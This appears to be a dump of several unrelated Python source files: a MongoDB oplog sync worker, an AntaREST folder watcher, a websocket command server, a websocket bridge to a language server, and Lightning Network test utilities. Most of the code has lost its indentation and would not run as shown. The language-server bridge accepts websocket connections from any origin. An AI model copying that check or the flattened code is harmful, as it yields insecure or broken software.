total = qi.qsize() # Only use that information for logging
while True:
try:
data = qi.get(timeout=1) # Timeout after 1 second, no need to wait more than that
if data == 'DONE':
                print('Process ' + str(job_id) + ': job done, stopping this process.')
qo.put('DONE')
return
else:
if data['collection_part']['db'] == "local" and data['collection_part']['coll'] == 'oplog.rs':
print('Process ' + str(job_id) + ': Start long-running job to clone the oplog')
else:
print('Process '+str(job_id)+': Start CollectionParts ~'+str(total - qi.qsize())+'/'+str(total))
data['collection_part']['configuration'] = configuration
collection_part = Core.create_collection_part(inputs = data['collection_part'])
collection_part.sync()
except QueueEmpty:
qo.put('DONE')
return # Exit when all work is done
except:
raise # Raise all other errors
class Core:
def __init__(self, configuration):
self.configuration = configuration
self.primary = Mongo(configuration, is_primary=True)
self.secondary = Mongo(configuration, is_primary=False)
"""
    In charge of launching the entire synchronisation of every database, delegating the work to a pool of worker processes (plus one long-running worker for the oplog).
"""
def start(self):
print('Prepare sync of the following databases: '+str(', '.join(self.primary.list_databases())))
# Check all CollectionParts we need to create
oplog_input = None
other_inputs = []
for db in self.primary.list_databases():
for coll in self.primary.list_collections(db):
collection = Collection(configuration=self.configuration, db=db, coll=coll)
collection_part_inputs = collection.prepare_sync()
for inputs in collection_part_inputs:
                    # We need to reserve a long-running worker for the oplog, so we put it as the first element of the queue
data = {'collection_part': inputs}
if db == "local" and coll == "oplog.rs":
oplog_input = data
else:
other_inputs.append(data)
if oplog_input is None:
raise ValueError("No oplog found...")
# Fill queues used for the multi-threading
qi = mp.Queue()
qo = mp.Queue()
qi.put(oplog_input)
for inputs in other_inputs:
qi.put(inputs)
        # Start the jobs. We need at least one worker process for the oplog, and at least one more for the other collections
jobs = []
jobs_quantity = 1 + int(max(1,self.configuration.internal_threads()))
common_info = {'configuration_filepath': Configuration.FILEPATH}
for i in range(int(jobs_quantity)):
qi.put('DONE')
job = mp.Process(target=clone_collection_part, args=(qi, qo, i, common_info, ))
job.start()
jobs.append(job)
job_done = 0
        while job_done < (jobs_quantity - 1):  # There is one long-running worker which should never finish by itself.
try:
res = qo.get(timeout=3600*24)
if res == 'DONE':
job_done += 1
print('Remaining jobs: '+str(jobs_quantity - job_done - 1))
except QueueEmpty: # We cannot put a super-huge time out, so we simply handle the exception
pass
except:
raise # Raise all other errors
        print('End of synchronisation for every database; the oplog synchronisation will continue until you stop this script. Afterwards, just remove the database from maintenance mode.')
"""
Create the appropriate CollectionPart instance
"""
@staticmethod
def create_collection_part(inputs):
if inputs['db'] == 'local' and inputs['coll'] == 'oplog.rs':
return OplogCollectionPart(**inputs)
else:
return BasicCollectionPart(**inputs)
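# Minimal usage sketch (hypothetical entry point; the configuration file path below is an
# assumption, not part of this module):
#   if __name__ == '__main__':
#       Configuration.FILEPATH = 'configuration.json'  # hypothetical path
#       Core(Configuration()).start()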
|
watcher.py
|
import logging
import re
import threading
from html import escape
from pathlib import Path
from time import time, sleep
from typing import List
from filelock import FileLock # type: ignore
from antarest.core.config import Config
from antarest.core.utils.fastapi_sqlalchemy import db
from antarest.login.model import Group
from antarest.study.model import StudyFolder, DEFAULT_WORKSPACE_NAME
from antarest.study.service import StudyService
logger = logging.getLogger(__name__)
class Watcher:
"""
    File watcher that listens for raw study changes and triggers a database update.
"""
LOCK = Path("watcher")
def __init__(self, config: Config, service: StudyService):
self.service = service
self.config = config
self.thread = (
threading.Thread(target=self._loop, daemon=True)
if not config.storage.watcher_lock
or Watcher._get_lock(config.storage.watcher_lock_delay)
else None
)
def start(self) -> None:
"""
Start watching
Returns:
"""
if self.thread:
self.thread.start()
@staticmethod
def _get_lock(lock_delay: int) -> bool:
"""
        Ensure only one watcher runs at a time by acquiring a lock on the filesystem.
        Returns: True if the watcher gets the lock, False otherwise.
"""
with FileLock(f"{Watcher.LOCK}.lock"):
start = (
int(f"0{Watcher.LOCK.read_text()}")
if Watcher.LOCK.exists()
else 0
)
now = int(time())
if now - start > lock_delay:
Watcher.LOCK.write_text(str(now))
logger.info("Watcher get lock")
return True
else:
logger.info("Watcher doesn't get lock")
return False
def _loop(self) -> None:
try:
logger.info(
"Removing duplicates, this is a temporary fix that should be removed when previous duplicates are removed"
)
with db():
self.service.remove_duplicates()
except Exception as e:
logger.error(
"Unexpected error when removing duplicates", exc_info=e
)
while True:
self._scan()
sleep(2)
def _scan(self) -> None:
"""
        Recursively scan the studies present on disk and send the updated list to the study service.
Returns:
"""
def rec_scan(
path: Path,
workspace: str,
groups: List[Group],
filter_in: List[str],
filter_out: List[str],
) -> List[StudyFolder]:
try:
if (path / "AW_NO_SCAN").exists():
logger.info(
f"No scan directive file found. Will skip further scan of folder {path}"
)
return []
if (path / "study.antares").exists():
logger.debug(f"Study {path.name} found in {workspace}")
return [StudyFolder(path, workspace, groups)]
else:
folders: List[StudyFolder] = list()
if path.is_dir():
for child in path.iterdir():
try:
if (
child.is_dir()
and any(
[
re.search(regex, child.name)
for regex in filter_in
]
)
and not any(
[
re.search(regex, child.name)
for regex in filter_out
]
)
):
folders = folders + rec_scan(
child,
workspace,
groups,
filter_in,
filter_out,
)
except Exception as e:
logger.error(
f"Failed to scan dir {child}", exc_info=e
)
return folders
except Exception as e:
logger.error(f"Failed to scan dir {path}", exc_info=e)
return []
studies: List[StudyFolder] = list()
for name, workspace in self.config.storage.workspaces.items():
if name != DEFAULT_WORKSPACE_NAME:
path = Path(workspace.path)
groups = [
Group(id=escape(g), name=escape(g))
for g in workspace.groups
]
studies = studies + rec_scan(
path,
name,
groups,
workspace.filter_in,
workspace.filter_out,
)
with db():
self.service.sync_studies_on_disk(studies)
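# Minimal wiring sketch (hypothetical; in the real application `config` and `service` are built
# and injected by the application, not constructed ad hoc like this):
#   watcher = Watcher(config=config, service=study_service)
#   watcher.start()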
|
tcp.py
|
import logging
log = logging.getLogger(__name__)
import asyncio
from functools import partial
import json
from threading import Thread
import websockets
async def handle_connection(video, websocket):
# The response is a two-tuple of error, result. If error is not None,
# result should be discarded by client.
async for mesg in websocket:
try:
cmd, kwargs = json.loads(mesg)
result = video.dispatch(cmd, **kwargs)
payload = None, result
await websocket.send(json.dumps(payload))
except websockets.exceptions.ConnectionClosedOK:
pass
except Exception as e:
payload = str(e), None
await websocket.send(json.dumps(payload))
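# Illustrative wire format (a sketch based on the handler above; the command name and kwargs are
# hypothetical and depend on what video.dispatch() accepts):
#   client -> server: ["some_command", {"value": 42}]
#   server -> client: [null, <result>]               # success: the error slot is None
#   server -> client: ["<exception message>", null]  # failure: the result should be discarded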
async def run_server(video, loop):
cb = partial(handle_connection, video)
async with websockets.serve(cb, video.hostname, video.port, loop=loop,
ping_interval=None):
while True:
await asyncio.sleep(0.1)
if video.stop.is_set():
break
def start_server(video, loop):
loop.run_until_complete(run_server(video, loop))
def video_tcp(video):
loop = asyncio.new_event_loop()
cb = partial(start_server, video, loop)
thread = Thread(target=cb)
thread.start()
print(f'Websocket server listening on ws://{video.hostname}:{video.port}')
thread.join()
print('Websocket server shutting down')
|
main.py
|
# https://github.com/palantir/python-jsonrpc-server/blob/develop/examples/langserver_ext.py
import json
import logging
import subprocess
import threading
from tornado import ioloop, process, web, websocket
from pyls_jsonrpc import streams
log = logging.getLogger(__name__)
class LanguageServerWebSocketHandler(websocket.WebSocketHandler):
"""Setup tornado websocket handler to host an external language server."""
writer = None
def open(self, *args, **kwargs):
log.info("Spawning pyls subprocess")
# Create an instance of the language server
proc = process.Subprocess(
['pyls', '-v'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE
)
# Create a writer that formats json messages with the correct LSP headers
self.writer = streams.JsonRpcStreamWriter(proc.stdin)
# Create a reader for consuming stdout of the language server. We need to
# consume this in another thread
def consume():
# Start a tornado IOLoop for reading/writing to the process in this thread
ioloop.IOLoop()
reader = streams.JsonRpcStreamReader(proc.stdout)
reader.listen(lambda msg: self.write_message(json.dumps(msg)))
thread = threading.Thread(target=consume)
thread.daemon = True
thread.start()
def on_message(self, message):
"""Forward client->server messages to the endpoint."""
self.writer.write(json.loads(message))
def check_origin(self, origin):
return True
if __name__ == "__main__":
app = web.Application([
(r"/python", LanguageServerWebSocketHandler),
])
app.listen(4000, address='127.0.0.1')
ioloop.IOLoop.current().start()
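# Illustrative client sketch (assumes the `websockets` package; the handler above simply relays
# JSON-RPC messages, so a minimal LSP `initialize` request could look like this):
#   import asyncio, json, websockets
#
#   async def demo():
#       async with websockets.connect("ws://127.0.0.1:4000/python") as ws:
#           await ws.send(json.dumps({"jsonrpc": "2.0", "id": 1, "method": "initialize",
#                                     "params": {"processId": None, "rootUri": None,
#                                                "capabilities": {}}}))
#           print(await ws.recv())
#
#   asyncio.get_event_loop().run_until_complete(demo())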
|
utils.py
|
from bitcoin.core import COIN # type: ignore
from bitcoin.rpc import RawProxy as BitcoinProxy # type: ignore
from bitcoin.rpc import JSONRPCError
from contextlib import contextmanager
from pathlib import Path
from pyln.client import RpcError
from pyln.testing.btcproxy import BitcoinRpcProxy
from collections import OrderedDict
from decimal import Decimal
from ephemeral_port_reserve import reserve # type: ignore
from pyln.client import LightningRpc
from pyln.client import Millisatoshi
import json
import logging
import lzma
import math
import os
import psutil # type: ignore
import random
import re
import shutil
import sqlite3
import string
import struct
import subprocess
import sys
import threading
import time
import warnings
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
"fallbackfee": Decimal(1000) / COIN,
}
LIGHTNINGD_CONFIG = OrderedDict({
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
})
FUNDAMOUNT = 10**6
def env(name, default=None):
"""Access to environment variables
Allows access to environment variables, falling back to config.vars (part
of c-lightning's `./configure` output), and finally falling back to a
default value.
"""
fname = 'config.vars'
if os.path.exists(fname):
lines = open(fname, 'r').readlines()
config = dict([(line.rstrip().split('=', 1)) for line in lines])
else:
config = {}
if name in os.environ:
return os.environ[name]
elif name in config:
return config[name]
else:
return default
VALGRIND = env("VALGRIND") == "1"
TEST_NETWORK = env("TEST_NETWORK", 'regtest')
DEVELOPER = env("DEVELOPER", "0") == "1"
TEST_DEBUG = env("TEST_DEBUG", "0") == "1"
SLOW_MACHINE = env("SLOW_MACHINE", "0") == "1"
DEPRECATED_APIS = env("DEPRECATED_APIS", "0") == "1"
TIMEOUT = int(env("TIMEOUT", 180 if SLOW_MACHINE else 60))
EXPERIMENTAL_DUAL_FUND = env("EXPERIMENTAL_DUAL_FUND", "0") == "1"
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success():
time_left = start_time + timeout - time.time()
if time_left <= 0:
raise ValueError("Timeout while waiting for {}", success)
time.sleep(min(interval, time_left))
interval *= 2
if interval > 5:
interval = 5
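# Example (a sketch with a hypothetical predicate): poll with exponential backoff, capped at 5s,
# until the condition holds or the timeout expires:
#   wait_for(lambda: os.path.exists('/tmp/ready'), timeout=30)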
def write_config(filename, opts, regtest_opts=None, section_name='regtest'):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
f.write("[{}]\n".format(section_name))
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
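# For reference, write_config() produces a plain key=value file followed by an optional section,
# e.g. (values illustrative):
#   regtest=1
#   rpcuser=rpcuser
#   [regtest]
#   rpcport=18443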
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def mine_funding_to_announce(bitcoind, nodes, num_blocks=5, wait_for_mempool=0):
"""Mine blocks so a channel can be announced (5, if it's already
mined), but make sure we don't leave nodes behind who will reject the
announcement. Not needed if there are only two nodes.
"""
bitcoind.generate_block(num_blocks - 1, wait_for_mempool)
sync_blockheight(bitcoind, nodes)
bitcoind.generate_block(1)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
def get_tx_p2wsh_outnum(bitcoind, tx, amount):
"""Get output number of this tx which is p2wsh of amount"""
decoded = bitcoind.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
return out['n']
return None
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
self.err_logs = []
self.prefix = ""
# Should we be logging lines we read from stdout?
self.verbose = verbose
# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self, stdin=None, stdout=None, stderr=None):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line,
stdin=stdin,
stdout=stdout if stdout else subprocess.PIPE,
stderr=stderr,
env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
line = line.decode('UTF-8', 'replace').rstrip()
if self.log_filter(line):
continue
if self.verbose:
sys.stdout.write("{}: {}\n".format(self.prefix, line))
with self.logs_cond:
self.logs.append(line)
self.logs_cond.notifyAll()
self.running = False
self.proc.stdout.close()
if self.proc.stderr:
for line in iter(self.proc.stderr.readline, ''):
if line is None or len(line) == 0:
break
line = line.rstrip().decode('UTF-8', 'replace')
self.err_logs.append(line)
self.proc.stderr.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def is_in_stderr(self, regex):
"""Look for `regex` in stderr."""
ex = re.compile(regex)
for l in self.err_logs:
if ex.search(l):
logging.debug("Found '%s' in stderr", regex)
return l
logging.debug("Did not find '%s' in stderr", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
The logs contain tailed stdout of the process. We look for each regex
in `regexs`, starting from `logsearch_start` which normally is the
position of the last found entry of a previous wait-for logs call.
The ordering inside `regexs` doesn't matter.
We fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
with self.logs_cond:
if pos >= len(self.logs):
if not self.running:
raise ValueError('Process died while waiting for logs')
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
    throwaway connections. This is easier than reaching into the RPC
    library to close, reopen and re-authenticate upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
logging.debug("Calling {name} with arguments {args}".format(
name=name,
args=args
))
res = proxy._call(name, *args)
logging.debug("Result for {name} call: {res}".format(
name=name,
res=res,
))
return res
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'bitcoind'
regtestdir = os.path.join(bitcoin_dir, 'regtest')
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
'bitcoind',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-txindex',
'-nowallet',
'-addresstype=bech32'
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
# For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
# needs its own [regtest] section.
BITCOIND_REGTEST = {'rpcport': rpcport}
self.conf_file = os.path.join(bitcoin_dir, 'bitcoin.conf')
write_config(self.conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.proxies = []
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
try:
self.rpc.createwallet("lightningd-tests")
except JSONRPCError:
self.rpc.loadwallet("lightningd-tests")
def stop(self):
for p in self.proxies:
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
def get_proxy(self):
proxy = BitcoinRpcProxy(self)
self.proxies.append(proxy)
proxy.start()
return proxy
# wait_for_mempool can be used to wait for the mempool before generating blocks:
    # True := wait for at least 1 transaction
    # int > 0 := wait for at least N transactions
    # 'tx_id' := wait for one transaction id given as a string
    # ['tx_id1', 'tx_id2'] := wait until all of the specified transaction IDs are in the mempool
def generate_block(self, numblocks=1, wait_for_mempool=0, to_addr=None):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(lambda: all(txid in self.rpc.getrawmempool() for txid in wait_for_mempool))
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
mempool = self.rpc.getrawmempool()
logging.debug("Generating {numblocks}, confirming {lenmempool} transactions: {mempool}".format(
numblocks=numblocks,
mempool=mempool,
lenmempool=len(mempool),
))
# As of 0.16, generate() is removed; use generatetoaddress.
if to_addr is None:
to_addr = self.rpc.getnewaddress()
return self.rpc.generatetoaddress(numblocks, to_addr)
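    # Illustrative calls (a sketch; `funding_txid` is a hypothetical transaction id):
    #   bitcoind.generate_block(6)                                  # just mine 6 blocks
    #   bitcoind.generate_block(1, wait_for_mempool=2)              # wait for >= 2 mempool txs first
    #   bitcoind.generate_block(1, wait_for_mempool=funding_txid)   # wait for that specific txid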
def simple_reorg(self, height, shift=0):
"""
Reorganize chain by creating a fork at height=[height] and re-mine all mempool
transactions into [height + shift], where shift >= 0. Returns hashes of generated
blocks.
        Note that txs that become invalid at [height] (because of coin maturity,
        locktime, etc.) are removed from the mempool. The length of the new chain will be original + 1
OR original + [shift], whichever is larger.
For example: to push tx's backward from height h1 to h2 < h1, use [height]=h2.
Or to change the txindex of tx's at height h1:
1. A block at height h2 < h1 should contain a non-coinbase tx that can be pulled
forward to h1.
2. Set [height]=h2 and [shift]= h1-h2
"""
hashes = []
fee_delta = 1000000
orig_len = self.rpc.getblockcount()
old_hash = self.rpc.getblockhash(height)
final_len = height + shift if height + shift > orig_len else 1 + orig_len
# TODO: raise error for insane args?
self.rpc.invalidateblock(old_hash)
self.wait_for_log(r'InvalidChainFound: invalid block=.* height={}'.format(height))
memp = self.rpc.getrawmempool()
if shift == 0:
hashes += self.generate_block(1 + final_len - height)
else:
for txid in memp:
# lower priority (to effective feerate=0) so they are not mined
self.rpc.prioritisetransaction(txid, None, -fee_delta)
hashes += self.generate_block(shift)
for txid in memp:
# restore priority so they are mined
self.rpc.prioritisetransaction(txid, None, fee_delta)
hashes += self.generate_block(1 + final_len - (height + shift))
self.wait_for_log(r'UpdateTip: new best=.* height={}'.format(final_len))
return hashes
def getnewaddress(self):
return self.rpc.getnewaddress()
class ElementsD(BitcoinD):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
config = BITCOIND_CONFIG.copy()
if 'regtest' in config:
del config['regtest']
config['chain'] = 'liquid-regtest'
BitcoinD.__init__(self, bitcoin_dir, rpcport)
self.cmd_line = [
'elementsd',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-nowallet',
'-validatepegin=0',
'-con_blocksubsidy=5000000000',
]
conf_file = os.path.join(bitcoin_dir, 'elements.conf')
config['rpcport'] = self.rpcport
BITCOIND_REGTEST = {'rpcport': self.rpcport}
write_config(conf_file, config, BITCOIND_REGTEST, section_name='liquid-regtest')
self.conf_file = conf_file
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.prefix = 'elementsd'
def getnewaddress(self):
"""Need to get an address and then make it unconfidential
"""
addr = self.rpc.getnewaddress()
info = self.rpc.getaddressinfo(addr)
return info['unconfidential']
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoindproxy, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
self.disconnect_file = None
self.rpcproxy = bitcoindproxy
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': '{}'.format("true" if DEPRECATED_APIS
else "false"),
'network': TEST_NETWORK,
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
# Make sure we don't touch any existing config files in the user's $HOME
'bitcoin-datadir': lightning_dir,
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(os.path.join(lightning_dir, TEST_NETWORK)):
os.makedirs(os.path.join(lightning_dir, TEST_NETWORK))
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, TEST_NETWORK, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-fast-gossip'] = None
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
opts = []
for k, v in self.opts.items():
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self, stdin=None, stdout=None, stderr=None,
wait_for_initialized=True):
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self, stdin, stdout, stderr)
if wait_for_initialized:
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
self.proc.wait(timeout)
return self.proc.returncode
class PrettyPrintingLightningRpc(LightningRpc):
"""A version of the LightningRpc that pretty-prints calls and results.
Useful when debugging based on logs, and less painful to the
eyes. It has some overhead since we re-serialize the request and
result to json in order to pretty print it.
Also validates (optional) schemas for us.
"""
def __init__(self, socket_path, executor=None, logger=logging,
patch_json=True, jsonschemas={}):
super().__init__(
socket_path,
executor,
logger,
patch_json,
)
self.jsonschemas = jsonschemas
def call(self, method, payload=None):
id = self.next_id
self.logger.debug(json.dumps({
"id": id,
"method": method,
"params": payload
}, indent=2))
res = LightningRpc.call(self, method, payload)
self.logger.debug(json.dumps({
"id": id,
"result": res
}, indent=2))
if method in self.jsonschemas:
self.jsonschemas[method].validate(res)
return res
class LightningNode(object):
def __init__(self, node_id, lightning_dir, bitcoind, executor, valgrind, may_fail=False,
may_reconnect=False,
allow_broken_log=False,
allow_warning=False,
allow_bad_gossip=False,
db=None, port=None, disconnect=None, random_hsm=None, options=None,
jsonschemas={},
valgrind_plugins=True,
**kwargs):
self.bitcoin = bitcoind
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
self.allow_broken_log = allow_broken_log
self.allow_bad_gossip = allow_bad_gossip
self.allow_warning = allow_warning
self.db = db
# Assume successful exit
self.rc = 0
socket_path = os.path.join(lightning_dir, TEST_NETWORK, "lightning-rpc").format(node_id)
self.rpc = PrettyPrintingLightningRpc(socket_path, self.executor, jsonschemas=jsonschemas)
self.daemon = LightningD(
lightning_dir, bitcoindproxy=bitcoind.get_proxy(),
port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
self.daemon.disconnect_file = os.path.join(lightning_dir, TEST_NETWORK, "dev_disconnect")
with open(self.daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
self.daemon.opts["dev-disconnect"] = "dev_disconnect"
if DEVELOPER:
self.daemon.opts["dev-fail-on-subdaemon-fail"] = None
# Don't run --version on every subdaemon if we're valgrinding and slow.
if SLOW_MACHINE and VALGRIND:
self.daemon.opts["dev-no-version-checks"] = None
if os.getenv("DEBUG_SUBD"):
self.daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if valgrind:
self.daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
self.daemon.opts["dev-no-plugin-checksum"] = None
else:
# Under valgrind, scanning can access uninitialized mem.
self.daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if not may_reconnect:
self.daemon.opts["dev-no-reconnect"] = None
if EXPERIMENTAL_DUAL_FUND:
self.daemon.opts["experimental-dual-fund"] = None
if options is not None:
self.daemon.opts.update(options)
dsn = db.get_dsn()
if dsn is not None:
self.daemon.opts['wallet'] = dsn
if valgrind:
trace_skip_pattern = '*python*,*bitcoin-cli*,*elements-cli*'
if not valgrind_plugins:
trace_skip_pattern += ',*plugins*'
self.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip={}'.format(trace_skip_pattern),
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(self.daemon.lightning_dir)
]
# Reduce precision of errors, speeding startup and reducing memory greatly:
if SLOW_MACHINE:
self.daemon.cmd_prefix += ['--read-inline-info=no']
def connect(self, remote_node):
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
def is_connected(self, remote_node):
return remote_node.info['id'] in [p['id'] for p in self.rpc.listpeers()['peers']]
def openchannel(self, remote_node, capacity=FUNDAMOUNT, addrtype="p2sh-segwit", confirm=True, wait_for_announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and not self.is_connected(remote_node):
self.connect(remote_node)
res = self.rpc.fundchannel(remote_node.info['id'], capacity)
if confirm or wait_for_announce:
self.bitcoin.generate_block(1, wait_for_mempool=res['txid'])
if wait_for_announce:
self.bitcoin.generate_block(5)
wait_for(lambda: ['alias' in e for e in self.rpc.listnodes(remote_node.info['id'])['nodes']])
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': res['tx']}
def fundwallet(self, sats, addrtype="p2sh-segwit", mine_block=True):
addr = self.rpc.newaddr(addrtype)[addrtype]
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
if mine_block:
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {} CONFIRMED'.format(txid))
return addr, txid
def fundbalancedchannel(self, remote_node, total_capacity, announce=True):
'''
Creates a perfectly-balanced channel, as all things should be.
'''
if isinstance(total_capacity, Millisatoshi):
total_capacity = int(total_capacity.to_satoshi())
else:
total_capacity = int(total_capacity)
self.fundwallet(total_capacity + 10000)
if remote_node.config('experimental-dual-fund'):
remote_node.fundwallet(total_capacity + 10000)
# We cut the total_capacity in half, since the peer's
# expected to contribute that same amount
chan_capacity = total_capacity // 2
total_capacity = chan_capacity * 2
# Tell the node to equally dual-fund the channel
remote_node.rpc.call('funderupdate', {'policy': 'match',
'policy_mod': 100,
'fuzz_percent': 0})
else:
chan_capacity = total_capacity
self.rpc.connect(remote_node.info['id'], 'localhost', remote_node.port)
res = self.rpc.fundchannel(remote_node.info['id'], chan_capacity, feerate='slow', minconf=0, announce=announce, push_msat=Millisatoshi(chan_capacity * 500))
blockid = self.bitcoin.generate_block(1, wait_for_mempool=res['txid'])[0]
# Generate the scid.
for i, txid in enumerate(self.bitcoin.rpc.getblock(blockid)['tx']):
if txid == res['txid']:
txnum = i
